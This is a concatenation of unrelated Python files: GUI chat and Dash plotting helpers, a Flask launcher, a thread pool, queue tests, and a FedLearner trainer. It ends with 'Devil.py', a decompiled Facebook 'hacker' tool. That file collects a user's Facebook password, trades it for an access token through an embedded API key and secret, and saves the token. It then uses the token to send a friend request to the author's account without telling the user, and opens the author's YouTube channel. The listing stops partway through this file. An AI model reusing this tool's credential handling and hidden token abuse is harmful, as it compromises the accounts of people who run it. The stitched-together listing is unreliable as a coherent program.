new_display = f"{record['PersonID']} : [{record['Chat']}]\n"
else:
new_display = f"{record['PersonID']} : [{record['Chat']}]\n"
messages += new_display
user_manager.chat_list = [messages]
if len(user_manager.chat_list) > 5:
user_manager.chat_list = user_manager.chat_list[:-5]
# Makes a string of messages to update the display
Update_Messages = ""
for messages in user_manager.chat_list:
Update_Messages += messages
# Send the Event back to the window if we haven't already stopped
if not user_manager.stop_thread:
# Time stamp the latest record
                    latest_record = sorted_chats[-1]
user_manager.latest_time = latest_record['Time']
# Send the event back to the window
self.window.write_event_value('-CHATTHREAD-', Update_Messages)
# The Thread stops - no loop - when the event is caught by the Window it starts a new long task
def render(self):
'''
The function to render the current instance of des_layout.
'''
if self.layout != []:
self.window = sg.Window('Data Explorer', self.layout, size=(750,750), grab_anywhere=False, finalize=True)
def listen(self):
'''
The function to start the event loop for the current instance of des_layout.
'''
if self.window != None:
cont = True
            while cont:
event, values = self.window.read()
for control in self.controls:
cont = control(event, values, {'view':self}, self.user_manager)
if event == 'Select CSV File':
file_path = sg.PopupGetFile('Please select a data source', file_types=(("CSV Files", "*.csv"),), initial_folder=self.data_path)
if file_path:
self.delete_figure_agg()
                        self.data_frame = pd.read_csv(file_path).pivot(index='place', columns='group', values='count')
data_plot = self.data_frame.plot(kind='line')
fig = plt.gcf()
self.figure_agg = self.draw_figure(self.window['-CANVAS-'].TKCanvas, fig)
self.user_manager.set_current_DES(os.path.basename(file_path))
self.set_up_chat_thread()
if event == 'Upload CSV File':
file_path = sg.PopupGetFile('Please select a data source', file_types=(("CSV Files", "*.csv"),), initial_folder="C:\\")
if file_path:
                        if not glob.glob(os.path.join(self.data_path, os.path.basename(file_path))):
shutil.copy(file_path, self.data_path)
if event == "Exit" :
self.user_manager.stop_thread = True
elif event == "-CHATTHREAD-" and not self.user_manager.stop_thread:
self.user_manager.stop_thread = True
self.window['chatbox'].Update(values[event])
if self.user_manager.stop_thread:
self.user_manager.stop_thread = False
self.set_up_chat_thread()
self.window.close()
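# Minimal usage sketch (assumes a user_manager object exposing jsnDrop, chat_thread,
# stop_thread, latest_time, chat_list and set_current_DES as used above):
#   view = des_layout(user_manager)
#   view.self_layout()
#   view.render()
#   view.listen()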
|
dash_tools.py
|
from multiprocessing import Process
import numpy as np
import dash
from dash import dcc
from dash import html
import json
import pickle
from plotly_scientific_plots.plotly_misc import jsonify
###Dash wrappers
def dashSubplot(plots,
min_width=18, # min width of column (in %). If more columns, scrolling is enabled
max_width=50, # max width of column (in %).
indiv_widths=None, # can specify list of individual column widths
title='' # str or list of strs
):
if isinstance(title, str):
title = [title]
# remove empty elements of list
plots = [[plt for plt in col if plt != []] for col in plots] # remove empty plots from each column
for i in range(len(plots)-1, -1, -1): # remove empty columns
if plots[i] == []:
plots.pop(i)
if indiv_widths is not None:
indiv_widths.pop(i)
Ncol = len(plots) # number of columns
if indiv_widths is None:
col_width = [min(max_width, max(int(100/Ncol-2), min_width) )] * Ncol
else:
col_width = indiv_widths
title = sum([[i, html.Br()] for i in title], [])[:-1]
col_style = [{'width': str(col_width[i]) + '%',
'display': 'inline-block',
'vertical-align': 'top',
'margin-right': '25px'} for i in range(Ncol)]
plot_divs = html.Div([html.Div(plots[i], style=col_style[i]) for i in range(Ncol)])
title_div = html.H3(title)
layout = html.Div(html.Div([title_div, plot_divs]),
style={'margin-right': '0px', 'position': 'absolute', 'width': '100%'})
return layout
def horizontlDiv(dashlist,
id='L', # either single element or list. If single, id of html divs will be this + # (ie 'L1', 'L2', etc..
width=50): #either total width or list of indiv widths
N = len(dashlist)
if type(width) == int:
indiv_width = [str(int(width/N))+'%'] * N
    elif type(width) == list:
        indiv_width = [str(int(w)) + '%' for w in width]
    else:
        raise ValueError('width must either be int or list of ints!')
horiz_div = [html.Div(i, id=id+str(c),
style={'width': indiv_width[c],
'display': 'inline-block',
'vertical-align': 'middle'})
for c, i in enumerate(dashlist)]
return horiz_div
def dashSubplot_from_figs(figs):
n_r = int(np.ceil(np.sqrt(len(figs))))
i_r = 0
i_c = 0
d_plot = [[] for i in range(n_r)]
    for fig in figs:
        da = dcc.Graph(figure=fig, id=' ')
        d_plot[i_r].append(da)
        # move to the next outer list once it holds n_r plots
        i_c += 1
        if i_c >= n_r:
            i_r += 1
            i_c = 0
layout = dashSubplot(d_plot)
return layout
def startDashboardSerial(figs,
min_width = 18, # min width of column (in %). If more columns, scrolling is enabled
max_width = 50, # max width of column (in %).
indiv_widths = None,
host=None, # set to '0.0.0.0' to run as a server. Default val is None (localhost)
title='',
port=8050,
run=True,
):
"""
This starts the dash layout
:param figs: a nested list of plotly figure objects. Each outer list is a column in the dashboard, and each
element within the outer list is a row within that column.
:return:
"""
# convert plotly fig objects to dash graph objects
graphs = []
for c_num, col in enumerate(figs):
g_col = []
for r_num, f in enumerate(col):
if f == []:
g_col += [[]]
elif isinstance(f, dash.development.base_component.Component):
g_col += [f]
else:
if 'meta' in f['layout'] and f['layout']['meta'] is not None:
id = f['layout']['meta']
else:
id = ['row_%d_col_%d' % (r_num, c_num)]
g_col += [dcc.Graph(figure=f, id=id[0])]
graphs += [g_col]
app = dash.Dash()
app.layout = dashSubplot(graphs, min_width, max_width, indiv_widths, title)
if run:
app.run_server(port=port, debug=False, host=host)
return app
def startDashboard(figs,
                   parr=False,  # T/F. If True, will spin up a separate python process for the Dash webserver
save=None, # either None or save_path
**kwargs # additional optional params for startDashboardSerial (e.g. min_width)
):
# First convert to json format to allow pkling for multiprocessing
figs_dictform = jsonify(figs)
    # save if necessary (currently only saves in pkl format)
    if save is not None:
# Note, can also use _dump_json, but its about 3x bigger filesize
_dump_pkl(figs_dictform, save)
if parr:
p = Process(target=startDashboardSerial, args=(figs_dictform,), kwargs=kwargs)
p.start()
return p
else:
startDashboardSerial(figs_dictform, **kwargs)
return None
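# Usage sketch (fig1/fig2 are assumed to be plotly figure objects; the nested list below
# renders as a single dashboard column with two rows):
#   startDashboard([[fig1, fig2]], title='My dashboard', port=8050)
# With parr=True the Dash server runs in a separate process and the returned Process
# handle can be joined or terminated by the caller.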
def _dump_pkl(obj, file_path):
''' Saves a pkl file '''
with open(file_path, 'wb') as dfile:
pickle.dump(obj, dfile, protocol = 2)
def _dump_json(obj, file_path):
''' Saves a json file '''
with open(file_path, 'w') as dfile:
json.dump(obj, dfile, indent = 4)
|
main.py
|
from market import app
from tools import cls
def page():
    app.run(debug=True, host="0.0.0.0", port=8080)
def run():
    page()
    # Alternatively, run the server in a background thread (requires `import threading`):
    # thread = threading.Thread(target=page)
    # thread.start()
if __name__ == '__main__':
    run()
    cls()
|
thread_pool.py
|
'''
File: thread_pool.py
Description: Thread pool management resources
Date: 28/09/2017
Author: Saurabh Badhwar <sbadhwar@redhat.com>
'''
from structures import ThreadPool
import threading
class ThreadPoolManager(object):
"""Lays out the interface for management of thread pool"""
def __init__(self):
"""Initialize the thread pool manager"""
self.thread_pool = ThreadPool()
def start_thread(self, application_name, target, params=None):
"""Start a new thread and adds it to thread pool
Keyword arguments:
application_name -- The name of the application whose thread is being
started
target -- The target method to be executed in thread
params -- The optional params that needs to be passed to the thread (Default: None)
"""
th = self.__start_thread(target, params)
self.thread_pool.add_thread(application_name, th)
def close_application(self, application_name):
"""Stop the application running in thread pool
Keyword arguments:
        application_name -- The name of the application to stop
Returns: Bool
"""
if self.thread_pool.is_application(application_name):
for thread in self.thread_pool.get_threads(application_name):
thread.join()
try:
self.thread_pool.remove_application(application_name)
except RuntimeError:
return False
return True
def __start_thread(self, target, params=None):
"""Start a new thread for the provided target
Keyword arguments:
target -- The target method to run as thread
params -- Parameters to be passed to target function
Returns:
threading.Thread
"""
        if params is None:
            app_thread = threading.Thread(target=target)
        else:
            app_thread = threading.Thread(target=target, args=params)
app_thread.daemon = True
app_thread.start()
return app_thread
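# Usage sketch (generate_report and report_id are hypothetical; params must be a tuple of
# positional arguments for the target):
#   manager = ThreadPoolManager()
#   manager.start_thread('reporting', generate_report, params=(report_id,))
#   ...
#   manager.close_application('reporting')  # joins the application's threads and removes them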
|
test_faster_fifo.py
|
import logging
import multiprocessing
from queue import Full, Empty
from unittest import TestCase
from faster_fifo import Queue
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
log = logging.getLogger('rl')
log.setLevel(logging.DEBUG)
log.handlers = [] # No duplicated handlers
log.propagate = False # workaround for duplicated logs in ipython
log.addHandler(ch)
MSG_SIZE = 5
# I think we don't need this anymore (check!)
# if sys.version_info >= (3, 8) and sys.platform == 'darwin':
# multiprocessing.set_start_method('fork')
def make_msg(msg_idx):
return (msg_idx,) * MSG_SIZE
def produce(q, p_idx, num_messages):
i = 0
while i < num_messages:
try:
q.put(make_msg(i), timeout=0.01)
if i % 50000 == 0:
log.info('Produce: %d %d', i, p_idx)
i += 1
except Full:
# time.sleep(0.001)
pass
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
def consume(q, p_idx, consume_many, total_num_messages=int(1e9)):
messages_received = 0
while True:
try:
msgs = q.get_many(timeout=0.01, max_messages_to_get=consume_many)
for msg in msgs:
messages_received += 1
if msg[0] % 50000 == 0:
log.info('Consume: %r %d num_msgs: %d', msg, p_idx, len(msgs))
if messages_received >= total_num_messages:
break
except Empty:
if q.is_closed():
break
except Exception as exc:
log.exception(exc)
log.info('Done! %d', p_idx)
class TestFastQueue(TestCase):
def test_singleproc(self):
q = Queue()
produce(q, 0, num_messages=20)
consume(q, 0, consume_many=2, total_num_messages=20)
q.close()
def test_multiproc(self):
q = Queue()
consume_many = 1000
producers = []
consumers = []
for j in range(20):
p = multiprocessing.Process(target=produce, args=(q, j, 1000001))
producers.append(p)
for j in range(3):
p = multiprocessing.Process(target=consume, args=(q, j, consume_many))
consumers.append(p)
for c in consumers:
c.start()
for p in producers:
p.start()
for p in producers:
p.join()
q.close()
for c in consumers:
c.join()
log.info('Exit...')
def test_msg(self):
q = Queue(max_size_bytes=1000)
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
res = q.get_nowait()
log.debug('got object %r', res)
self.assertEqual(py_obj, res)
def test_msg_many(self):
q = Queue(max_size_bytes=100000)
py_objs = [dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk') for _ in range(5)]
q.put_many_nowait(py_objs)
res = q.get_many_nowait()
while not q.empty():
res.extend(q.get_many_nowait())
log.debug('Got object %r', res)
self.assertEqual(py_objs, res)
q.put_nowait(py_objs)
res = q.get_nowait()
self.assertEqual(py_objs, res)
def test_queue_size(self):
q = Queue(max_size_bytes=1000)
py_obj_1 = dict(a=10, b=20)
py_obj_2 = dict(a=30, b=40)
q.put_nowait(py_obj_1)
q.put_nowait(py_obj_2)
q_size_bef = q.qsize()
log.debug('Queue size after put - %d', q_size_bef)
num_messages = 0
want_to_read = 2
while num_messages < want_to_read:
msgs = q.get_many()
print(msgs)
num_messages += len(msgs)
self.assertEqual(type(q_size_bef), int)
q_size_af = q.qsize()
log.debug('Queue size after get - %d', q_size_af)
self.assertEqual(q_size_af, 0)
def test_queue_empty(self):
q = Queue(max_size_bytes=1000)
self.assertTrue(q.empty())
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put_nowait(py_obj)
q_empty = q.empty()
self.assertFalse(q_empty)
def test_queue_full(self):
q = Queue(max_size_bytes=60)
self.assertFalse(q.full())
py_obj = (1, 2)
while True:
try:
q.put_nowait(py_obj)
except Full:
self.assertTrue(q.full())
break
def test_queue_usage(self):
q = Queue(1000 * 1000) # specify the size of the circular buffer in the ctor
# any pickle-able Python object can be added to the queue
py_obj = dict(a=42, b=33, c=(1, 2, 3), d=[1, 2, 3], e='123', f=b'kkk')
q.put(py_obj)
assert q.qsize() == 1
retrieved = q.get()
assert q.empty()
assert py_obj == retrieved
for i in range(100):
try:
q.put(py_obj, timeout=0.1)
except Full:
log.debug('Queue is full!')
num_received = 0
while num_received < 100:
# get multiple messages at once, returns a list of messages for better performance in many-to-few scenarios
# get_many does not guarantee that all max_messages_to_get will be received on the first call, in fact
# no such guarantee can be made in multiprocessing systems.
# get_many() will retrieve as many messages as there are available AND can fit in the pre-allocated memory
# buffer. The size of the buffer is increased gradually to match demand.
messages = q.get_many(max_messages_to_get=100)
num_received += len(messages)
try:
q.get(timeout=0.1)
assert True, 'This won\'t be called'
except Empty:
log.debug('Queue is empty')
def spawn_producer(data_q_):
for i in range(10):
data = [1, 2, 3, i]
data_q_.put(data)
def spawn_consumer(data_q_):
i = 0
while True:
try:
data = data_q_.get(timeout=0.5)
print(data)
i += 1
except Empty:
print('Read', i, 'messages')
break
class TestSpawn(TestCase):
def test_spawn_ctx(self):
ctx = multiprocessing.get_context('spawn')
data_q = Queue(1000 * 1000)
procs = [
ctx.Process(target=spawn_producer, args=(data_q,)) for _ in range(2)
]
procs.append(ctx.Process(target=spawn_consumer, args=(data_q,)))
for p in procs:
p.start()
for p in procs:
p.join()
|
trainer_worker.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import argparse
import json
import threading
import tensorflow.compat.v1 as tf
from fedlearner.common import fl_logging
from fedlearner.common import metrics
from fedlearner.trainer.bridge import Bridge
from fedlearner.trainer.estimator import FLEstimator
from fedlearner.trainer.sparse_estimator import SparseFLEstimator
from fedlearner.trainer.trainer_master_client \
import LocalTrainerMasterClient, TrainerMasterClient
from fedlearner.trainer.trainer_master \
import LeaderTrainerMaster, FollowerTrainerMaster, ExportModelHook
from fedlearner.trainer.data_visitor import DataPathVisitor, DataSourceVisitor
from fedlearner.trainer.cluster_server import ClusterServer
LEADER = "leader"
FOLLOER = "follower"
class StepMetricsHook(tf.train.SessionRunHook):
def __init__(self, tensor_dict=None, every_n_iter=5, tags_dict=None):
if tensor_dict is None:
tensor_dict = {}
if tags_dict is None:
tags_dict = {}
self._tensor_names = list(tensor_dict.keys())
self._tag_names = list(tags_dict.keys())
# merge
self._tensor_dict = {**tensor_dict, **tags_dict}
self._every_n_iter = every_n_iter
self._iter = 0
def before_run(self, run_context):
return tf.estimator.SessionRunArgs(self._tensor_dict)
def after_run(self, run_context, run_value):
self._iter += 1
if self._iter % self._every_n_iter == 0:
result = run_value.results
tags = {}
for tag in self._tag_names:
if tag in result:
tags[tag] = result[tag]
for name in self._tensor_names:
if name in result:
metrics.emit_store(name=name, value=result[name], tags=tags)
class StepLossAucMetricsHook(StepMetricsHook):
def __init__(self, loss_tensor, auc_tensor, every_n_iter=5,
event_time_tensor=None):
tensor_dict = {"loss": loss_tensor,
"auc": auc_tensor}
tags_dict = {}
if event_time_tensor is not None:
tags_dict["event_time"] = event_time_tensor
super(StepLossAucMetricsHook, self).__init__(
tensor_dict, every_n_iter, tags_dict
)
def create_argument_parser():
parser = argparse.ArgumentParser(description='FedLearner Trainer.')
parser.add_argument('--master',
action='store_true',
help='Run as trainer master only')
parser.add_argument('--worker',
action='store_true',
help='Run as trainer worker only')
parser.add_argument('--application-id',
type=str,
default="fl_trainer",
help='application id on distributed training.')
parser.add_argument('--master-addr',
type=str,
help='Address of trainer master, ' \
'in [IP]:[PORT] format. ' \
'Use local master for testing if set to None.')
parser.add_argument('--local-addr',
type=str,
help='Listen address of the local bridge, ' \
'in [IP]:[PORT] format')
parser.add_argument('--peer-addr',
type=str,
help='Address of peer\'s bridge, ' \
'in [IP]:[PORT] format')
parser.add_argument('--cluster-spec',
type=str,
help='ClusterSpec description for master/ps/worker, '\
'in json format')
parser.add_argument('--worker-rank',
type=int,
default=0,
help='the rank of this worker.')
parser.add_argument('--ps-addrs',
type=str,
help='Comma-separated list of parameter server ' \
'addresses in [IP]:[PORT] format. ' \
'value for this argument must be identical ' \
'for all workers.')
parser.add_argument('--data-source',
type=str,
help='path to data source for training')
parser.add_argument('--data-path',
type=str,
                        help='path to data block files for training. '
                             'Ignored if data-source is set')
parser.add_argument('--start-date',
type=int,
help='training data start time')
parser.add_argument('--end-date',
type=int,
help='training data end time')
parser.add_argument('--epoch-num',
type=int,
default=1,
                        help='number of epochs for training, not '
                             'supported in online training')
parser.add_argument('--shuffle',
type=bool,
help='shuffle the data block or not')
parser.add_argument('--export-path',
type=str,
help='Path to save exported models.')
parser.add_argument('--checkpoint-path',
type=str,
help='Path to save and load model checkpoints.')
parser.add_argument('--load-checkpoint-filename',
type=str,
help='filename to load model checkpoints, ' \
'Relative path to checkpoint-path')
parser.add_argument('--load-checkpoint-filename-with-path',
type=str,
help='filename with path to load model checkpoints')
parser.add_argument('--save-checkpoint-steps',
type=int,
default=1000,
help='Number of steps between checkpoints.')
parser.add_argument('--save-checkpoint-secs',
type=int,
help='Number of secs between checkpoints.')
parser.add_argument('--summary-path',
type=str,
help='Path to save summary files used by tensorboard.')
parser.add_argument('--summary-save-steps',
type=int,
help='Number of steps to save summary files.')
parser.add_argument('--summary-save-secs',
type=int,
help='Number of secs to save summary files.')
parser.add_argument('--sparse-estimator',
type=bool,
help='Whether using sparse estimator.')
parser.add_argument('--mode',
type=str,
default='train',
help='Train or eval.')
parser.add_argument('--loglevel',
type=str,
default=None,
help="Specify verbosity level. It can be one of "
"'debug', 'info', 'warning', 'error', 'critical'")
return parser
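# Example invocation sketch (flag names come from the parser above; the entry script,
# addresses and paths are placeholders - FedLearner model code typically wraps this
# parser in its own entry point):
#   python my_model.py --worker --worker-rank=0 \
#       --master-addr=10.0.0.1:50051 --local-addr=0.0.0.0:50052 --peer-addr=10.0.0.2:50052 \
#       --cluster-spec='{"clusterSpec": {"PS": ["10.0.0.3:2222"], "Worker": ["10.0.0.4:2222"]}}' \
#       --data-path=/data/blocks --mode=train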
def _run_master(role,
args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=None):
if not args.master_addr:
raise ValueError("master-addr is required")
try:
cluster_spec = _create_cluster_spec(args, require_ps=True)
except ValueError:
cluster_spec = None
cluster_server = None
if cluster_spec:
cluster_server = ClusterServer(cluster_spec, "master")
checkpoint_filename_with_path = _get_checkpoint_filename_with_path(args)
data_visitor = _create_data_visitor(args)
master_factory = LeaderTrainerMaster \
if role == LEADER else FollowerTrainerMaster
master = master_factory(
cluster_server,
data_visitor,
model_fn,
input_fn,
serving_input_receiver_fn,
checkpoint_filename_with_path,
checkpoint_path=args.checkpoint_path,
save_checkpoint_steps=args.save_checkpoint_steps,
save_checkpoint_secs=args.save_checkpoint_secs,
summary_path=args.summary_path,
summary_save_steps=args.summary_save_steps,
summary_save_secs=args.summary_save_secs,
export_path=args.export_path,
sparse_estimator=args.sparse_estimator,
export_model_hook=export_model_hook)
master.run_forever(args.master_addr)
def _run_worker(role, args, input_fn, model_fn):
if not args.local_addr:
raise ValueError("local-addr is required")
if not args.peer_addr:
raise ValueError("peer-addr is required")
if not args.master_addr:
raise ValueError("master-addr is required")
mode = args.mode.lower()
if mode not in ('train', 'eval'):
raise ValueError("--mode must set one of 'train' or 'eval'")
cluster_spec = _create_cluster_spec(args, require_ps=True)
cluster_server = ClusterServer(cluster_spec,
"worker",
task_index=args.worker_rank)
trainer_master = TrainerMasterClient(args.master_addr,
args.worker_rank)
if not trainer_master.worker_register(cluster_spec.as_cluster_def()):
return
bridge = Bridge(role,
int(args.local_addr.split(':')[1]),
args.peer_addr,
args.application_id,
args.worker_rank)
estimator_factory = SparseFLEstimator \
if args.sparse_estimator else FLEstimator
estimator = estimator_factory(cluster_server,
trainer_master,
bridge,
role,
model_fn,
is_chief=args.worker_rank == 0)
if mode == 'train':
estimator.train(input_fn)
elif mode == 'eval':
estimator.evaluate(input_fn)
trainer_master.worker_complete(bridge.terminated_at)
trainer_master.wait_master_complete()
def _run_local(role,
args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=None):
if not args.local_addr:
raise ValueError("local-addr is required")
if not args.peer_addr:
raise ValueError("peer-addr is required")
mode = args.mode.lower()
if mode not in ('train', 'eval'):
raise ValueError("--mode must set one of 'train' or 'eval'")
cluster_spec = _create_cluster_spec(args)
cluster_server = ClusterServer(cluster_spec, "local")
# run master
checkpoint_filename_with_path = _get_checkpoint_filename_with_path(args)
data_visitor = _create_data_visitor(args)
master_factory = LeaderTrainerMaster \
if role == LEADER else FollowerTrainerMaster
local_master = master_factory(
cluster_server,
data_visitor,
model_fn,
input_fn,
serving_input_receiver_fn,
checkpoint_filename_with_path,
checkpoint_path=args.checkpoint_path,
save_checkpoint_steps=args.save_checkpoint_steps,
save_checkpoint_secs=args.save_checkpoint_secs,
summary_path=args.summary_path,
summary_save_steps=args.summary_save_steps,
summary_save_secs=args.summary_save_secs,
export_path=args.export_path,
sparse_estimator=args.sparse_estimator,
export_model_hook=export_model_hook)
master_thread = threading.Thread(target=local_master.run_forever)
    master_thread.daemon = True
master_thread.start()
# run worker
trainer_master = LocalTrainerMasterClient(local_master, 0)
if not trainer_master.worker_register():
return
bridge = Bridge(role,
int(args.local_addr.split(':')[1]),
args.peer_addr,
args.application_id,
0)
estimator_factory = \
SparseFLEstimator if args.sparse_estimator else FLEstimator
estimator = estimator_factory(cluster_server,
trainer_master,
bridge,
role,
model_fn)
if mode == 'train':
estimator.train(input_fn)
elif mode == 'eval':
estimator.evaluate(input_fn)
trainer_master.worker_complete(bridge.terminated_at)
trainer_master.wait_master_complete()
def _get_checkpoint_filename_with_path(args):
checkpoint_filename_with_path = None
if args.load_checkpoint_filename_with_path:
checkpoint_filename_with_path = args.load_checkpoint_filename_with_path
elif args.load_checkpoint_filename:
if not args.checkpoint_path:
raise ValueError("checkpoint_path is required "
"when provide checkpoint_filename")
checkpoint_filename_with_path = \
os.path.join(args.checkpoint_path, args.checkpoint_filename)
elif args.checkpoint_path:
checkpoint_filename_with_path = \
tf.train.latest_checkpoint(args.checkpoint_path)
if not checkpoint_filename_with_path:
return None
if not tf.train.checkpoint_exists(checkpoint_filename_with_path):
raise RuntimeError("not a valid checkpoint file: %s" \
%checkpoint_filename_with_path)
return checkpoint_filename_with_path
def _create_cluster_spec(args, require_ps=False):
cluster_spec_dict = dict()
if args.cluster_spec:
cluster_spec = json.loads(args.cluster_spec)["clusterSpec"]
if "Master" in cluster_spec \
and isinstance(cluster_spec['Master'], list):
cluster_spec_dict["master"] = cluster_spec["Master"]
if "PS" in cluster_spec \
and isinstance(cluster_spec['PS'], list):
cluster_spec_dict["ps"] = cluster_spec["PS"]
if "Worker" in cluster_spec \
and isinstance(cluster_spec['Worker'], list):
cluster_spec_dict["worker"] = cluster_spec["Worker"]
elif args.ps_addrs:
cluster_spec_dict["ps"] = \
[addr.strip() for addr in args.ps_addrs.split(",")]
if require_ps:
if "ps" not in cluster_spec_dict or len(cluster_spec_dict["ps"]) == 0:
raise ValueError("ps is required")
return tf.train.ClusterSpec(cluster_spec_dict)
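# Example of the --cluster-spec JSON consumed above (hosts are placeholders):
#   {"clusterSpec": {"Master": ["10.0.0.1:2222"],
#                    "PS": ["10.0.0.2:2222"],
#                    "Worker": ["10.0.0.3:2222", "10.0.0.4:2222"]}}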
def _create_data_visitor(args):
visitor = None
start_date = int(args.start_date) if args.start_date else None
end_date = int(args.end_date) if args.end_date else None
if args.data_source:
visitor = DataSourceVisitor(args.data_source,
start_date=start_date,
end_date=end_date,
epoch_num=args.epoch_num,
shuffle=args.shuffle)
elif args.data_path:
visitor = DataPathVisitor(args.data_path,
epoch_num=args.epoch_num,
shuffle=args.shuffle)
if not visitor:
raise ValueError("cannot found any data to train, "
"please specify --data-source or --data-path")
return visitor
def train(role,
args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=None):
if not isinstance(role, str):
raise ValueError("--role is not a string")
role = role.lower()
if role not in (LEADER, FOLLOER):
raise ValueError("--role must set one of %s or %s"%(LEADER, FOLLOER))
if args.loglevel:
fl_logging.set_level(args.loglevel)
if export_model_hook is not None:
if not isinstance(export_model_hook, ExportModelHook):
raise ValueError("model_export_hook must be a "
"ExportModelHook, but get %r"%export_model_hook)
if not (args.master or args.worker):
fl_logging.info("************ Run as local mode ************")
_run_local(role, args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=export_model_hook)
elif args.master:
fl_logging.info("************ Run as master mode ************")
_run_master(role, args,
input_fn,
model_fn,
serving_input_receiver_fn,
export_model_hook=export_model_hook)
elif args.worker: # args.worker
fl_logging.info("************ Run as worker mode ************")
_run_worker(role, args, input_fn, model_fn)
else:
raise ValueError("duplication specify --master and --worker")
|
Devil.py
|
# Decompiled by Hacker WaSI
# Upgraded By WaSeem Akram
import os
import sys
import time
import datetime
import random
import hashlib
import re
import threading
import json
import getpass
import urllib
import requests
import mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [
('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print('\x1b[1;91m[!] Exit')
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.6\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mHacker WaSi\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mEvil Devill\x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96mUSE WISELY \x1b[1;97m/ \x1b[1;96mHaCker WaSi\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/evildevill\x1b[0m\n[*] Decompiled by WaSim AkraM\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print(
            '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLogging in \x1b[1;97m' + o,)
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print(logo)
print(40 * '\x1b[1;97m\xe2\x95\x90')
print(
            '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN FACEBOOK ACCOUNT \x1b[1;91m[\xe2\x98\x86]')
id = raw_input(
'\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass(
'\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print('\n\x1b[1;91m[!] No connection')
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + \
'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + \
pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1',
'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print(
'\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin successful')
requests.post(
'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system(
'xdg-open https://www.youtube.com/channel/UC0bX56PZ_nMZw3t4p90SYyQ')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
